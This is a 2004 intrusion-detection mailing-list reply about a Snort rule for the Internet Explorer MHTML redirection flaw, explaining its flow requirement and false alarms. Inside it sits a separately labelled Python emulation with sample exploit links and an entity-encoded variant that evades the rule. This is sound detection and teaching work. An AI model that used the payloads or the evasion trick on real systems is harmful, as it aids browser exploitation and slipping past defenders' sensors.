[Intrusions] mhtml signature

Derek Edwards derekedw at yahoo.com
Tue Aug 10 21:04:04 GMT 2004


Hi,

Thank you, Lola!  It's OUR signature now.   ;^)

With the number of IE bugs that have been announced recently, yet
remain unpatched, I think this signature is one to watch for a while,
as the spammers, spyware pushers, and ad mongers are using it and other
bugs actively (my $0.02).

Question #1 is well covered.  I'd just like to add a thought to
Question #2.  I've found that the signature doesn't false positive
often, but it has "false alarmed" often.  

I've had it trigger in various ways, including discussions of the MHTML
problem that I found on the Neohapsis archive and on the messages in
this thread.  None of these has resulted in a code download, though,
since these were in the content, vs. in a HTML tag.

As I note in the sig definition, some alerts will be missed if the
characters are too cleverly encoded.

Good luck on your practical.  My Track 3 LMP class is just starting.

-D

lola marais [lola_marais at hotmail.com] writes:
> Credit is given to the owner of this signature at
>
> I am planning on using this signature for a detect in part 2 of my GCIA
> practical.
> 
> The problem is that I am not able to get it working 100% with the
> data that I have. By not working I mean that it will miss the single
> packet that I have captured.
> 
> I have captured some data from a network using tcpdump. The capture
> contains the data content required to trigger the event. The capture
> contains a single packet for that session, no more.
> 
> When I read the data past Snort with the signature enabled, then NO
> alerts are triggered. If I remove the part of the signature
> "flow:from_server,established" and then pass the same data, I have 1
> event.
> 
> The signature looks for an established connection.
> My question is:
> 
> 1. Why has the author of the signature decided to look for an
> established connection?
> 2. Does the signature stand a chance of missing some events by
> looking only for established connections?
> 
> The current version of the signature has the following structure.
> 
> alert tcp any any -> $HOME_NET any (msg:"Microsoft MHTML URL
> Redirection Attempt"; flow:from_server,established;
> content:"mhtml|3A|file|3A|"; nocase; reference:cve,CAN-2004-0380;
> reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx;
> classtype:web-application-attack; rev:2;)
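The following is an added example, not code from Derek, Lola or the Snort project: a small Python emulation of the two rule options under discussion, `flow:from_server,established` and `content:"mhtml|3A|file|3A|"; nocase;`, run over constructed packets. It shows why a lone data packet captured without its handshake never satisfies `established`, why a mailing-list message that merely talks about `mhtml:file:` still trips the raw content match (Derek's "false alarm"), and how a trivially entity-encoded payload slips past the byte match. The addresses, port numbers, HTML payloads and the href/src attribute heuristic are all assumptions made for the illustration; the heuristic is not part of the real rule.

```python
"""Toy emulation of flow:from_server,established + content:"mhtml|3A|file|3A|"; nocase.
Added example; packets, addresses and payloads are constructed, not captured."""
import html
import re
from dataclasses import dataclass, field

# content:"mhtml|3A|file|3A|" is the byte string b"mhtml:file:" (0x3A is ':');
# nocase makes the match case-insensitive.
CONTENT = re.compile(re.escape(b"mhtml:file:"), re.IGNORECASE)

# Hypothetical refinement (not in the rule): only count it when the string is
# in an href/src attribute the browser would actually follow.
IN_ATTRIBUTE = re.compile(rb"""(?:href|src)\s*=\s*["']?\s*mhtml:file:""", re.IGNORECASE)


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str                # "S", "SA", "A" or "PA"; constructed, no real TCP here
    payload: bytes = b""


@dataclass
class FlowTable:
    """Minimal handshake tracker: a flow is established once the client's SYN
    has been answered by a SYN/ACK from the server."""
    syn_seen: set = field(default_factory=set)
    established: set = field(default_factory=set)   # keyed client -> server

    def update(self, p: Packet) -> None:
        fwd = (p.src, p.sport, p.dst, p.dport)
        rev = (p.dst, p.dport, p.src, p.sport)
        if p.flags == "S":
            self.syn_seen.add(fwd)
        elif p.flags == "SA" and rev in self.syn_seen:
            self.established.add(rev)

    def from_server_established(self, p: Packet) -> bool:
        """True when p travels server -> client on a flow we saw set up."""
        rev = (p.dst, p.dport, p.src, p.sport)
        return rev in self.established


def rule_fires(p: Packet, flows: FlowTable, require_flow: bool = True) -> bool:
    """With require_flow=False this is the rule minus flow:from_server,established."""
    if require_flow and not flows.from_server_established(p):
        return False
    return CONTENT.search(p.payload) is not None


def likely_exploit(payload: bytes) -> bool:
    """Undo HTML entity encoding, then require the string inside href/src."""
    decoded = html.unescape(payload.decode("latin-1")).encode("latin-1", "replace")
    return IN_ATTRIBUTE.search(decoded) is not None


# Constructed sample traffic.
CLIENT, SERVER = "10.1.2.3", "203.0.113.5"
EXPLOIT_HTML = b'<a href="MHTML:file://C:\\x.mht!http://example.test/p.html">go</a>'
DISCUSSION = b'<p>The Snort sig matches on mhtml:file: in the payload.</p>'
ENTITY_ENCODED = b'<a href="&#109;html:file://C:\\x.mht!http://example.test/p.html">go</a>'


def run_scenarios() -> dict:
    out = {}
    # 1. Full session: SYN, SYN/ACK, ACK, then the server's HTML.
    flows = FlowTable()
    for p in (Packet(CLIENT, 40001, SERVER, 80, "S"),
              Packet(SERVER, 80, CLIENT, 40001, "SA"),
              Packet(CLIENT, 40001, SERVER, 80, "A")):
        flows.update(p)
    data = Packet(SERVER, 80, CLIENT, 40001, "PA", EXPLOIT_HTML)
    out["full_session"] = rule_fires(data, flows)
    # 2. A pcap holding only the data packet: no handshake, so never "established".
    out["lone_packet_with_flow"] = rule_fires(data, FlowTable())
    out["lone_packet_no_flow"] = rule_fires(data, FlowTable(), require_flow=False)
    # 3. Text that merely discusses the string still matches the raw rule.
    talk = Packet(SERVER, 80, CLIENT, 40001, "PA", DISCUSSION)
    out["discussion_raw_rule"] = rule_fires(talk, flows)
    out["discussion_refined"] = likely_exploit(DISCUSSION)
    # 4. Entity-encoded attribute: the byte match misses it, the decoded check does not.
    out["encoded_raw_rule"] = CONTENT.search(ENTITY_ENCODED) is not None
    out["encoded_refined"] = likely_exploit(ENTITY_ENCODED)
    return out


if __name__ == "__main__":
    for name, fired in run_scenarios().items():
        print(f"{name:24s} {'ALERT' if fired else '-'}")
```

The flow tracker here is deliberately naive: in a real sensor whether a session seen mid-stream ever becomes "established" depends on how the stream preprocessor is configured, so a single captured packet is the worst case for this rule, not the only case. The entity-encoded payload is the kind of "clever encoding" the post mentions; a raw `content` match operates on the bytes on the wire, so anything the browser decodes after the fact is invisible to it unless a normalizing preprocessor sits in front of the rule.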



		
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail 


